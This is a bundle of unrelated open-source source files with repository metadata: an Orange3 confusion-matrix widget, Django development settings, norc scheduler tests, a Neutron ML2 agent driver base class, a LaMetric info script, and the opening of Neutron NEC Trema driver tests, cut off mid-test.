view.verticalHeader().hide()
view.horizontalHeader().setMinimumSectionSize(60)
view.selectionModel().selectionChanged.connect(self._invalidate)
view.setShowGrid(False)
view.setItemDelegate(BorderedItemDelegate(Qt.white))
view.clicked.connect(self.cell_clicked)
grid.addWidget(view, 0, 0)
self.mainArea.layout().addLayout(grid)
def sizeHint(self):
"""Initial size"""
return QSize(750, 490)
def _item(self, i, j):
return self.tablemodel.item(i, j) or QStandardItem()
def _set_item(self, i, j, item):
self.tablemodel.setItem(i, j, item)
def _init_table(self, nclasses):
item = self._item(0, 2)
item.setData("Predicted", Qt.DisplayRole)
item.setTextAlignment(Qt.AlignCenter)
item.setFlags(Qt.NoItemFlags)
self._set_item(0, 2, item)
item = self._item(2, 0)
item.setData("Actual", Qt.DisplayRole)
item.setTextAlignment(Qt.AlignHCenter | Qt.AlignBottom)
item.setFlags(Qt.NoItemFlags)
self.tableview.setItemDelegateForColumn(0, gui.VerticalItemDelegate())
self._set_item(2, 0, item)
self.tableview.setSpan(0, 2, 1, nclasses)
self.tableview.setSpan(2, 0, nclasses, 1)
font = self.tablemodel.invisibleRootItem().font()
bold_font = QFont(font)
bold_font.setBold(True)
for i in (0, 1):
for j in (0, 1):
item = self._item(i, j)
item.setFlags(Qt.NoItemFlags)
self._set_item(i, j, item)
for p, label in enumerate(self.headers):
for i, j in ((1, p + 2), (p + 2, 1)):
item = self._item(i, j)
item.setData(label, Qt.DisplayRole)
item.setFont(bold_font)
item.setTextAlignment(Qt.AlignRight | Qt.AlignVCenter)
item.setFlags(Qt.ItemIsEnabled)
if p < len(self.headers) - 1:
item.setData("br"[j == 1], BorderRole)
item.setData(QColor(192, 192, 192), BorderColorRole)
self._set_item(i, j, item)
hor_header = self.tableview.horizontalHeader()
if len(' '.join(self.headers)) < 120:
hor_header.setResizeMode(QHeaderView.ResizeToContents)
else:
hor_header.setDefaultSectionSize(60)
self.tablemodel.setRowCount(nclasses + 3)
self.tablemodel.setColumnCount(nclasses + 3)
def set_results(self, results):
"""Set the input results."""
prev_sel_learner = self.selected_learner
self.clear()
self.warning([0, 1])
self.closeContext()
data = None
if results is not None and results.data is not None:
data = results.data
if data is not None and not data.domain.has_discrete_class:
self.warning(
0, "Confusion Matrix cannot be used for regression results.")
self.results = results
self.data = data
if data is not None:
class_values = data.domain.class_var.values
elif results is not None:
raise NotImplementedError
if results is None:
self.report_button.setDisabled(True)
else:
self.report_button.setDisabled(False)
nmodels = results.predicted.shape[0]
self.headers = class_values + \
[unicodedata.lookup("N-ARY SUMMATION")]
# NOTE: The 'learner_names' is set in 'Test Learners' widget.
if hasattr(results, "learner_names"):
self.learners = results.learner_names
else:
self.learners = ["Learner #{}".format(i + 1)
for i in range(nmodels)]
self._init_table(len(class_values))
self.openContext(data.domain.class_var)
if prev_sel_learner is None or \
prev_sel_learner >= len(self.learners):
self.selected_learner = 0
else:
self.selected_learner = prev_sel_learner
self._update()
self._set_selection()
self.unconditional_commit()
def clear(self):
"""Reset the widget, clear controls"""
self.results = None
self.data = None
self.tablemodel.clear()
self.headers = []
# Clear learners last. This action will invoke `_learner_changed`
self.learners = []
def select_correct(self):
"""Select the diagonal elements of the matrix"""
selection = QItemSelection()
n = self.tablemodel.rowCount()
for i in range(2, n):
index = self.tablemodel.index(i, i)
selection.select(index, index)
self.tableview.selectionModel().select(
selection, QItemSelectionModel.ClearAndSelect)
def select_wrong(self):
"""Select the off-diagonal elements of the matrix"""
selection = QItemSelection()
n = self.tablemodel.rowCount()
for i in range(2, n):
for j in range(i + 1, n):
index = self.tablemodel.index(i, j)
selection.select(index, index)
index = self.tablemodel.index(j, i)
selection.select(index, index)
self.tableview.selectionModel().select(
selection, QItemSelectionModel.ClearAndSelect)
def select_none(self):
"""Reset selection"""
self.tableview.selectionModel().clear()
def cell_clicked(self, model_index):
"""Handle cell click event"""
i, j = model_index.row(), model_index.column()
if not i or not j:
return
n = self.tablemodel.rowCount()
index = self.tablemodel.index
selection = None
if i == j == 1 or i == j == n - 1:
selection = QItemSelection(index(2, 2), index(n - 1, n - 1))
elif i in (1, n - 1):
selection = QItemSelection(index(2, j), index(n - 1, j))
elif j in (1, n - 1):
selection = QItemSelection(index(i, 2), index(i, n - 1))
if selection is not None:
self.tableview.selectionModel().select(
selection, QItemSelectionModel.ClearAndSelect)
def commit(self):
"""Output data instances corresponding to selected cells"""
if self.results is not None and self.data is not None \
and self.selected_learner is not None:
indices = self.tableview.selectedIndexes()
indices = {(ind.row() - 2, ind.column() - 2) for ind in indices}
actual = self.results.actual
learner_name = self.learners[self.selected_learner]
predicted = self.results.predicted[self.selected_learner]
selected = [i for i, t in enumerate(zip(actual, predicted))
if t in indices]
row_indices = self.results.row_indices[selected]
extra = []
class_var = self.data.domain.class_var
metas = self.data.domain.metas
if self.append_predictions:
predicted = numpy.array(predicted[selected], dtype=object)
extra.append(predicted.reshape(-1, 1))
var = Orange.data.DiscreteVariable(
"{}({})".format(class_var.name, learner_name),
class_var.values
)
metas = metas + (var,)
if self.append_probabilities and \
self.results.probabilities is not None:
probs = self.results.probabilities[self.selected_learner,
selected]
extra.append(numpy.array(probs, dtype=object))
pvars = [Orange.data.ContinuousVariable("p({})".format(value))
for value in class_var.values]
metas = metas + tuple(pvars)
X = self.data.X[row_indices]
Y = self.data.Y[row_indices]
M = self.data.metas[row_indices]
row_ids = self.data.ids[row_indices]
M = numpy.hstack((M,) + tuple(extra))
domain = Orange.data.Domain(
self.data.domain.attributes,
self.data.domain.class_vars,
metas
)
data = Orange.data.Table.from_numpy(domain, X, Y, M)
data.ids = row_ids
data.name = learner_name
else:
data = None
self.send("Selected Data", data)
def _invalidate(self):
indices = self.tableview.selectedIndexes()
self.selection = {(ind.row() - 2, ind.column() - 2) for ind in indices}
self.commit()
def _set_selection(self):
selection = QItemSelection()
index = self.tableview.model().index
for row, col in self.selection:
sel = index(row + 2, col + 2)
selection.select(sel, sel)
self.tableview.selectionModel().select(
selection, QItemSelectionModel.ClearAndSelect)
def _learner_changed(self):
self._update()
self._set_selection()
self.commit()
def _update(self):
def _isinvalid(x):
return isnan(x) or isinf(x)
# Update the displayed confusion matrix
if self.results is not None and self.selected_learner is not None:
cmatrix = confusion_matrix(self.results, self.selected_learner)
colsum = cmatrix.sum(axis=0)
rowsum = cmatrix.sum(axis=1)
n = len(cmatrix)
diag = numpy.diag_indices(n)
colors = cmatrix.astype(numpy.double)
colors[diag] = 0
if self.selected_quantity == 0:
normalized = cmatrix.astype(numpy.int)
formatstr = "{}"
div = numpy.array([colors.max()])
else:
if self.selected_quantity == 1:
normalized = 100 * cmatrix / colsum
div = colors.max(axis=0)
else:
normalized = 100 * cmatrix / rowsum[:, numpy.newaxis]
div = colors.max(axis=1)[:, numpy.newaxis]
formatstr = "{:2.1f} %"
div[div == 0] = 1
colors /= div
colors[diag] = normalized[diag] / normalized[diag].max()
for i in range(n):
for j in range(n):
val = normalized[i, j]
col_val = colors[i, j]
item = self._item(i + 2, j + 2)
item.setData(
"NA" if _isinvalid(val) else formatstr.format(val),
Qt.DisplayRole)
bkcolor = QColor.fromHsl(
[0, 240][i == j], 160,
255 if _isinvalid(col_val) else int(255 - 30 * col_val))
item.setData(QBrush(bkcolor), Qt.BackgroundRole)
item.setData("trbl", BorderRole)
item.setToolTip("actual: {}\npredicted: {}".format(
self.headers[i], self.headers[j]))
item.setTextAlignment(Qt.AlignRight | Qt.AlignVCenter)
item.setFlags(Qt.ItemIsEnabled | Qt.ItemIsSelectable)
self._set_item(i + 2, j + 2, item)
bold_font = self.tablemodel.invisibleRootItem().font()
bold_font.setBold(True)
def _sum_item(value, border=""):
item = QStandardItem()
item.setData(value, Qt.DisplayRole)
item.setTextAlignment(Qt.AlignRight | Qt.AlignVCenter)
item.setFlags(Qt.ItemIsEnabled)
item.setFont(bold_font)
item.setData(border, BorderRole)
item.setData(QColor(192, 192, 192), BorderColorRole)
return item
for i in range(n):
self._set_item(n + 2, i + 2, _sum_item(int(colsum[i]), "t"))
self._set_item(i + 2, n + 2, _sum_item(int(rowsum[i]), "l"))
self._set_item(n + 2, n + 2, _sum_item(int(rowsum.sum())))
def send_report(self):
"""Send report"""
if self.results is not None and self.selected_learner is not None:
self.report_table(
"Confusion matrix for {} (showing {})".
format(self.learners[self.selected_learner],
self.quantities[self.selected_quantity].lower()),
self.tableview)
if __name__ == "__main__":
from PyQt4.QtGui import QApplication
APP = QApplication([])
w = OWConfusionMatrix()
w.show()
IRIS = Orange.data.Table("iris")
RES_CV = Orange.evaluation.CrossValidation(
IRIS, [Orange.classification.TreeLearner(),
Orange.classification.MajorityLearner()],
store_data=True)
w.set_results(RES_CV)
APP.exec_()
| {
"content_hash": "3a7f57e388c61da21584a6efcdea37cf",
"timestamp": "",
"source": "github",
"line_count": 482,
"max_line_length": 80,
"avg_line_length": 37.27800829875519,
"alnum_prop": 0.5619434550311665,
"repo_name": "qPCR4vir/orange3",
"id": "6126453904f9fe23fcb3374e7d14879a83df3a82",
"size": "17968",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Orange/widgets/evaluate/owconfusionmatrix.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "C",
"bytes": "20412"
},
{
"name": "C++",
"bytes": "1992"
},
{
"name": "GLSL",
"bytes": "75"
},
{
"name": "HTML",
"bytes": "3503"
},
{
"name": "JavaScript",
"bytes": "12007"
},
{
"name": "Jupyter Notebook",
"bytes": "6662"
},
{
"name": "NSIS",
"bytes": "20281"
},
{
"name": "Python",
"bytes": "4205054"
},
{
"name": "Shell",
"bytes": "48335"
}
],
"symlink_target": ""
} |
"""
Django settings for django_webapp project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
from __future__ import unicode_literals
import logging
import os
from django.contrib import messages
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '3-=5gak18&c8z+khk0@5i5!66n!qim4oy#wh&a_&x&(%h^1s2z'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_webapp',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'django_webapp.urls'
WSGI_APPLICATION = 'django_webapp.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
LOGGING_CONFIG = None
logging.basicConfig(level=logging.INFO)
MESSAGE_TAGS = {
messages.DEBUG: 'alert-info',
messages.INFO: 'alert-info',
messages.SUCCESS: 'alert-success',
messages.WARNING: 'alert-warning',
messages.ERROR: 'alert-danger',
}
"""
Expiration time of uuidCookie (in seconds)
"""
UUIDCOOKIE_EXPIRE_TIME = 5
UUIDCOOKIE_PREFIX = 'cookie-'
REDIS_HOST = 'localhost'
REDIS_PORT = 6379
REDIS_DB = 0
| {
"content_hash": "90a3ac89429db623e04bc53454a35135",
"timestamp": "",
"source": "github",
"line_count": 112,
"max_line_length": 71,
"avg_line_length": 22.678571428571427,
"alnum_prop": 0.7192913385826771,
"repo_name": "data-tsunami/NodeJS-SocketIO-Redis-Python-Nginx",
"id": "bb73d21ab62102d36a857cb45dc31f4f805675ba",
"size": "2565",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django_webapp/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "110"
},
{
"name": "JavaScript",
"bytes": "6106"
},
{
"name": "Python",
"bytes": "4034"
}
],
"symlink_target": ""
} |
"""Test schedule handling cases in the SchedulableTask class."""
import os, sys
from threading import Thread
from datetime import timedelta, datetime
from django.test import TestCase
from norc.core.models import Scheduler, Schedule, CronSchedule
from norc.core.constants import Status, Request
from norc.norc_utils import wait_until, log
from norc.norc_utils.testing import make_queue, make_task
class SchedulerTest(TestCase):
@property
def scheduler(self):
return Scheduler.objects.get(pk=self._scheduler.pk)
def setUp(self):
self._scheduler = Scheduler.objects.create()
self._scheduler.log = log.Log(os.devnull)
self.thread = Thread(target=self._scheduler.start)
self.thread.start()
wait_until(lambda: self.scheduler.is_alive(), 3)
def test_stop(self):
self.scheduler.make_request(Request.STOP)
self._scheduler.flag.set()
wait_until(lambda: not self.scheduler.is_alive(), 3)
def test_schedule(self):
task = make_task()
queue = make_queue()
s = Schedule.create(task, queue, 0, 5)
self._scheduler.flag.set()
wait_until(lambda: s.instances.count() == 5, 5)
def test_cron(self):
task = make_task()
queue = make_queue()
s = CronSchedule.create(task, queue, 'o*d*w*h*m*s*', 3)
self._scheduler.flag.set()
wait_until(lambda: queue.count() == 3, 8)
enqueued = map(lambda i: i.enqueued, s.instances)
def fold(acc, e):
self.assertEqual(e - acc, timedelta(seconds=1))
return e
reduce(fold, enqueued)
def test_update_schedule(self):
task = make_task()
queue = make_queue()
s = CronSchedule.create(task, queue, 'o*d*w*h*m*s*', 10)
self._scheduler.flag.set()
wait_until(lambda: queue.count() == 2, 5)
s.encoding = 'o*d*w*h*m*s4'
s.save()
self.assertRaises(Exception,
lambda: wait_until(lambda: s.instances.count() > 3, 3))
def test_make_up(self):
task = make_task()
queue = make_queue()
s = Schedule.create(task, queue, 1, 10, -10, True)
self._scheduler.flag.set()
wait_until(lambda: s.instances.count() == 10, 5)
s = Schedule.create(task, queue, 60, 10, -10, False)
self._scheduler.flag.set()
wait_until(lambda: s.instances.count() == 1, 5)
def test_cron_make_up(self):
task = make_task()
queue = make_queue()
now = datetime.utcnow()
s = CronSchedule(encoding='o*d*w*h*m*s%s' % ((now.second - 1) % 60),
task=task, queue=queue, repetitions=0, remaining=0, make_up=False)
s.base = now - timedelta(seconds=2)
s.save()
self._scheduler.flag.set()
wait_until(lambda: s.instances.count() == 1, 3)
now = datetime.utcnow()
s = CronSchedule(encoding='o*d*w*h*m*s*',
task=task, queue=queue, repetitions=0, remaining=0, make_up=True)
s.base = now - timedelta(seconds=5)
s.save()
self._scheduler.flag.set()
wait_until(lambda: s.instances.count() == 6, 1)
def test_reload(self):
task = make_task()
queue = make_queue()
now = datetime.utcnow()
s = CronSchedule.create(task, queue, 'o*d*w*h*m*s%s' %
((now.second - 1) % 60), 1)
self._scheduler.flag.set()
wait_until(lambda: self.scheduler.cronschedules.count() == 1, 5)
CronSchedule.objects.get(pk=s.pk).reschedule('o*d*w*h*m*s*')
self.scheduler.make_request(Request.RELOAD)
self._scheduler.flag.set()
wait_until(lambda: s.instances.count() == 1, 10)
def test_duplicate(self):
task = make_task()
queue = make_queue()
s = Schedule.create(task, queue, 1, 2, start=2)
self._scheduler.flag.set()
wait_until(lambda: self.scheduler.schedules.count() == 1, 2)
s = Schedule.objects.get(pk=s.pk)
s.scheduler = None
s.save()
self._scheduler.flag.set()
wait_until(lambda: s.instances.count() == 2, 5)
def test_bad_schedule(self):
task = make_task()
queue = make_queue()
s = CronSchedule.create(task, queue, "o*d*w*h*m*s*")
s.encoding = "gibberish"
s.save()
self._scheduler.flag.set()
wait_until(lambda: CronSchedule.objects.get(pk=s.pk).deleted, 2)
#def test_stress(self):
# task = make_task()
# queue = make_queue()
# for i in range(5000):
# CronSchedule.create(task, queue, 'HALFHOURLY')
# self._scheduler.flag.set()
# wait_until(lambda: self._scheduler.cronschedules.count() == 5000, 60)
def tearDown(self):
if not Status.is_final(self._scheduler.status):
self._scheduler.make_request(Request.KILL)
self.thread.join(15)
assert not self.thread.isAlive()
assert not self._scheduler.timer.isAlive()
| {
"content_hash": "9813ed0f1df38d2c116cd2218031516b",
"timestamp": "",
"source": "github",
"line_count": 139,
"max_line_length": 78,
"avg_line_length": 36.280575539568346,
"alnum_prop": 0.5843743803291691,
"repo_name": "darrellsilver/norc",
"id": "0bb16a00261ddac1db666e57402c0f32d1f7b5f8",
"size": "5044",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "core/tests/scheduler_test.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "20532"
},
{
"name": "Python",
"bytes": "165903"
}
],
"symlink_target": ""
} |
import abc
from neutron_lib.api.definitions import portbindings
from neutron_lib.callbacks import resources
from neutron_lib import constants as const
from neutron_lib.plugins.ml2 import api
from oslo_log import log
import six
from neutron._i18n import _
from neutron.db import provisioning_blocks
LOG = log.getLogger(__name__)
@six.add_metaclass(abc.ABCMeta)
class AgentMechanismDriverBase(api.MechanismDriver):
"""Base class for drivers that attach to networks using an L2 agent.
The AgentMechanismDriverBase provides common code for mechanism
drivers that integrate the ml2 plugin with L2 agents. Port binding
with this driver requires the driver's associated agent to be
running on the port's host, and that agent to have connectivity to
at least one segment of the port's network.
MechanismDrivers using this base class must pass the agent type to
__init__(), and must implement try_to_bind_segment_for_agent().
"""
def __init__(self, agent_type,
supported_vnic_types=[portbindings.VNIC_NORMAL]):
"""Initialize base class for specific L2 agent type.
:param agent_type: Constant identifying agent type in agents_db
:param supported_vnic_types: The binding:vnic_type values we can bind
"""
self.agent_type = agent_type
self.supported_vnic_types = supported_vnic_types
def initialize(self):
pass
def create_port_precommit(self, context):
self._insert_provisioning_block(context)
def update_port_precommit(self, context):
if context.host == context.original_host:
return
self._insert_provisioning_block(context)
def _insert_provisioning_block(self, context):
# we insert a status barrier to prevent the port from transitioning
# to active until the agent reports back that the wiring is done
port = context.current
if not context.host or port['status'] == const.PORT_STATUS_ACTIVE:
# no point in putting in a block if the status is already ACTIVE
return
vnic_type = context.current.get(portbindings.VNIC_TYPE,
portbindings.VNIC_NORMAL)
if vnic_type not in self.supported_vnic_types:
# we check the VNIC type because there could be multiple agents
# on a single host with different VNIC types
return
if context.host_agents(self.agent_type):
provisioning_blocks.add_provisioning_component(
context._plugin_context, port['id'], resources.PORT,
provisioning_blocks.L2_AGENT_ENTITY)
def bind_port(self, context):
LOG.debug("Attempting to bind port %(port)s on "
"network %(network)s",
{'port': context.current['id'],
'network': context.network.current['id']})
vnic_type = context.current.get(portbindings.VNIC_TYPE,
portbindings.VNIC_NORMAL)
if vnic_type not in self.supported_vnic_types:
LOG.debug("Refusing to bind due to unsupported vnic_type: %s",
vnic_type)
return
agents = context.host_agents(self.agent_type)
if not agents:
LOG.debug("Port %(pid)s on network %(network)s not bound, "
"no agent of type %(at)s registered on host %(host)s",
{'pid': context.current['id'],
'at': self.agent_type,
'network': context.network.current['id'],
'host': context.host})
for agent in agents:
LOG.debug("Checking agent: %s", agent)
if agent['alive']:
for segment in context.segments_to_bind:
if self.try_to_bind_segment_for_agent(context, segment,
agent):
LOG.debug("Bound using segment: %s", segment)
return
else:
LOG.warning("Refusing to bind port %(pid)s to dead agent: "
"%(agent)s",
{'pid': context.current['id'], 'agent': agent})
@abc.abstractmethod
def try_to_bind_segment_for_agent(self, context, segment, agent):
"""Try to bind with segment for agent.
:param context: PortContext instance describing the port
:param segment: segment dictionary describing segment to bind
:param agent: agents_db entry describing agent to bind
:returns: True iff segment has been bound for agent
Called outside any transaction during bind_port() so that
derived MechanismDrivers can use agent_db data along with
built-in knowledge of the corresponding agent's capabilities
to attempt to bind to the specified network segment for the
agent.
If the segment can be bound for the agent, this function must
call context.set_binding() with appropriate values and then
return True. Otherwise, it must return False.
"""
def blacklist_supported_vnic_types(self, vnic_types, blacklist):
"""Validate the blacklist and blacklist the supported_vnic_types
:param vnic_types: The supported_vnic_types list
:param blacklist: The blacklist as in vnic_type_blacklist
:return The blacklisted vnic_types
"""
if not blacklist:
return vnic_types
# Not valid values in the blacklist:
if not all(bl in vnic_types for bl in blacklist):
raise ValueError(_("Not all of the items from vnic_type_blacklist "
"are valid vnic_types for %(agent)s mechanism "
"driver. The valid values are: "
"%(valid_vnics)s.") %
{'agent': self.agent_type,
'valid_vnics': vnic_types})
supported_vnic_types = [vnic_t for vnic_t in vnic_types if
vnic_t not in blacklist]
# Nothing left in the supported vnict types list:
if len(supported_vnic_types) < 1:
raise ValueError(_("All possible vnic_types were blacklisted for "
"%s mechanism driver!") % self.agent_type)
return supported_vnic_types
@six.add_metaclass(abc.ABCMeta)
class SimpleAgentMechanismDriverBase(AgentMechanismDriverBase):
"""Base class for simple drivers using an L2 agent.
The SimpleAgentMechanismDriverBase provides common code for
mechanism drivers that integrate the ml2 plugin with L2 agents,
where the binding:vif_type and binding:vif_details values are the
same for all bindings. Port binding with this driver requires the
driver's associated agent to be running on the port's host, and
that agent to have connectivity to at least one segment of the
port's network.
MechanismDrivers using this base class must pass the agent type
and the values for binding:vif_type and binding:vif_details to
__init__(), and must implement check_segment_for_agent().
"""
def __init__(self, agent_type, vif_type, vif_details,
supported_vnic_types=[portbindings.VNIC_NORMAL]):
"""Initialize base class for specific L2 agent type.
:param agent_type: Constant identifying agent type in agents_db
:param vif_type: Value for binding:vif_type when bound
:param vif_details: Dictionary with details for VIF driver when bound
:param supported_vnic_types: The binding:vnic_type values we can bind
"""
super(SimpleAgentMechanismDriverBase, self).__init__(
agent_type, supported_vnic_types)
self.vif_type = vif_type
self.vif_details = vif_details
def try_to_bind_segment_for_agent(self, context, segment, agent):
if self.check_segment_for_agent(segment, agent):
context.set_binding(segment[api.ID],
self.get_vif_type(context, agent, segment),
self.get_vif_details(context, agent, segment))
return True
else:
return False
def get_vif_details(self, context, agent, segment):
return self.vif_details
def get_vif_type(self, context, agent, segment):
"""Return the vif type appropriate for the agent and segment."""
return self.vif_type
@abc.abstractmethod
def get_allowed_network_types(self, agent=None):
"""Return the agent's or driver's allowed network types.
For example: return ('flat', ...). You can also refer to the
configuration the given agent exposes.
"""
pass
@abc.abstractmethod
def get_mappings(self, agent):
"""Return the agent's bridge or interface mappings.
For example: agent['configurations'].get('bridge_mappings', {}).
"""
pass
def physnet_in_mappings(self, physnet, mappings):
"""Is the physical network part of the given mappings?"""
return physnet in mappings
def filter_hosts_with_segment_access(
self, context, segments, candidate_hosts, agent_getter):
hosts = set()
filters = {'host': candidate_hosts, 'agent_type': [self.agent_type]}
for agent in agent_getter(context, filters=filters):
if any(self.check_segment_for_agent(s, agent) for s in segments):
hosts.add(agent['host'])
return hosts
def check_segment_for_agent(self, segment, agent):
"""Check if segment can be bound for agent.
:param segment: segment dictionary describing segment to bind
:param agent: agents_db entry describing agent to bind
:returns: True iff segment can be bound for agent
Called outside any transaction during bind_port so that derived
MechanismDrivers can use agent_db data along with built-in
knowledge of the corresponding agent's capabilities to
determine whether or not the specified network segment can be
bound for the agent.
"""
mappings = self.get_mappings(agent)
allowed_network_types = self.get_allowed_network_types(agent)
LOG.debug("Checking segment: %(segment)s "
"for mappings: %(mappings)s "
"with network types: %(network_types)s",
{'segment': segment, 'mappings': mappings,
'network_types': allowed_network_types})
network_type = segment[api.NETWORK_TYPE]
if network_type not in allowed_network_types:
LOG.debug(
'Network %(network_id)s with segment %(id)s is type '
'of %(network_type)s but agent %(agent)s or mechanism driver '
'only support %(allowed_network_types)s.',
{'network_id': segment['network_id'],
'id': segment['id'],
'network_type': network_type,
'agent': agent['host'],
'allowed_network_types': allowed_network_types})
return False
if network_type in [const.TYPE_FLAT, const.TYPE_VLAN]:
physnet = segment[api.PHYSICAL_NETWORK]
if not self.physnet_in_mappings(physnet, mappings):
LOG.debug(
'Network %(network_id)s with segment %(id)s is connected '
'to physical network %(physnet)s, but agent %(agent)s '
'reported physical networks %(mappings)s. '
'The physical network must be configured on the '
'agent if binding is to succeed.',
{'network_id': segment['network_id'],
'id': segment['id'],
'physnet': physnet,
'agent': agent['host'],
'mappings': mappings})
return False
return True
| {
"content_hash": "17d8d0d438f6c6022213e31985e616f2",
"timestamp": "",
"source": "github",
"line_count": 281,
"max_line_length": 79,
"avg_line_length": 42.95017793594306,
"alnum_prop": 0.6048554146988151,
"repo_name": "noironetworks/neutron",
"id": "ee1fa12e8e325f4b6125c01a6d8fbca50826103a",
"size": "12709",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "neutron/plugins/ml2/drivers/mech_agent.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "1047"
},
{
"name": "Python",
"bytes": "11420614"
},
{
"name": "Shell",
"bytes": "38791"
}
],
"symlink_target": ""
} |
from pprint import pprint
from lmnotify import LaMetricManager
def main():
# create an instance of the LaMetricManager
lmn = LaMetricManager()
# --- test cloud ---
# get the user
print("USER\n")
pprint(lmn.get_user(), indent=2)
# get devices
devices = lmn.get_devices()
print("\nDEVICES\n")
pprint(devices, indent=2)
# --- test local device ---
# use first device to do some tests
lmn.set_device(devices[0])
# get all available API endpoints
print("\nENDPOINTS\n")
pprint(lmn.get_endpoint_map(), indent=2)
# get the state of the device
print("\nDEVICE\n")
pprint(lmn.get_device_state(), indent=2)
# get display brightness
print("\nDISPLAY\n")
pprint(lmn.get_display(), indent=2)
# get the volume
print("\nVOLUME\n")
pprint(lmn.get_volume(), indent=2)
# get the bluetooth state
print("\nBLUETOOTH\n")
pprint(lmn.get_bluetooth_state(), indent=2)
# get the wifi state
print("\nWIFI\n")
pprint(lmn.get_wifi_state(), indent=2)
if __name__ == "__main__":
main()
| {
"content_hash": "4a696eb94dd1fd686603950e9ed671ec",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 47,
"avg_line_length": 20.77358490566038,
"alnum_prop": 0.6167120799273388,
"repo_name": "keans/lmnotify",
"id": "5c4d336e2810f1fcab3708e365ed0833478e4d6d",
"size": "1148",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/info.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "43799"
}
],
"symlink_target": ""
} |
import random
import mock
from neutron.openstack.common import uuidutils
from neutron.plugins.nec.common import ofc_client
from neutron.plugins.nec.db import models as nmodels
from neutron.plugins.nec import drivers
from neutron.tests import base
class TestConfig(object):
"""Configuration for this test."""
host = '127.0.0.1'
port = 8888
class TremaDriverTestBase(base.BaseTestCase):
driver_name = "trema"
def setUp(self):
super(TremaDriverTestBase, self).setUp()
self.driver = drivers.get_driver(self.driver_name)(TestConfig)
self.do_request = mock.patch.object(ofc_client.OFCClient,
'do_request').start()
def get_ofc_item_random_params(self):
"""create random parameters for ofc_item test."""
tenant_id = uuidutils.generate_uuid()
network_id = uuidutils.generate_uuid()
port_id = uuidutils.generate_uuid()
mac = ':'.join(['%x' % random.randint(0, 255) for i in xrange(6)])
portinfo = nmodels.PortInfo(id=port_id, datapath_id="0x123456789",
port_no=1234, vlan_id=321,
mac=mac)
return tenant_id, network_id, portinfo
class TremaDriverNetworkTestBase(TremaDriverTestBase):
def test_create_tenant(self):
t, n, p = self.get_ofc_item_random_params()
ret = self.driver.create_tenant('dummy_desc', t)
ofc_t_path = "/tenants/%s" % t
self.assertEqual(ofc_t_path, ret)
# There is no API call.
self.assertEqual(0, self.do_request.call_count)
def test_update_tenant(self):
t, n, p = self.get_ofc_item_random_params()
path = "/tenants/%s" % t
self.driver.update_tenant(path, 'dummy_desc')
# There is no API call.
self.assertEqual(0, self.do_request.call_count)
def testc_delete_tenant(self):
t, n, p = self.get_ofc_item_random_params()
path = "/tenants/%s" % t
self.driver.delete_tenant(path)
# There is no API call.
self.assertEqual(0, self.do_request.call_count)
def testa_create_network(self):
t, n, p = self.get_ofc_item_random_params()
description = "desc of %s" % n
body = {'id': n, 'description': description}
ret = self.driver.create_network(t, description, n)
self.do_request.assert_called_once_with("POST", "/networks", body=body)
self.assertEqual(ret, '/networks/%s' % n)
def testc_delete_network(self):
t, n, p = self.get_ofc_item_random_params()
net_path = "/networks/%s" % n
self.driver.delete_network(net_path)
self.do_request.assert_called_once_with("DELETE", net_path)
class TremaPortBaseDriverTest(TremaDriverNetworkTestBase):
driver_name = "trema_port"
def test_filter_supported(self):
self.assertTrue(self.driver.filter_supported())
def testd_create_port(self):
_t, n, p = self.get_ofc_item_random_params()
net_path = "/networks/%s" % n
body = {'id': p.id,
'datapath_id': p.datapath_id,
'port': str(p.port_no),
'vid': str(p.vlan_id)}
ret = self.driver.create_port(net_path, p, p.id)
self.do_request.assert_called_once_with(
"POST", "/networks/%s/ports" % n, body=body)
self.assertEqual(ret, '/networks/%s/ports/%s' % (n, p.id))
def testd_delete_port(self):
t, n, p = self.get_ofc_item_random_params()
p_path = "/networks/%s/ports/%s" % (n, p.id)
self.driver.delete_port(p_path)
self.do_request.assert_called_once_with("DELETE", p_path)
class TremaPortMACBaseDriverTest(TremaDriverNetworkTestBase):
driver_name = "trema_portmac"
def test_filter_supported(self):
self.assertTrue(self.driver.filter_supported())
def testd_create_port(self):
t, n, p = self.get_ofc_item_random_params()
dummy_port = "dummy-%s" % p.id
net_path = "/networks/%s" % n
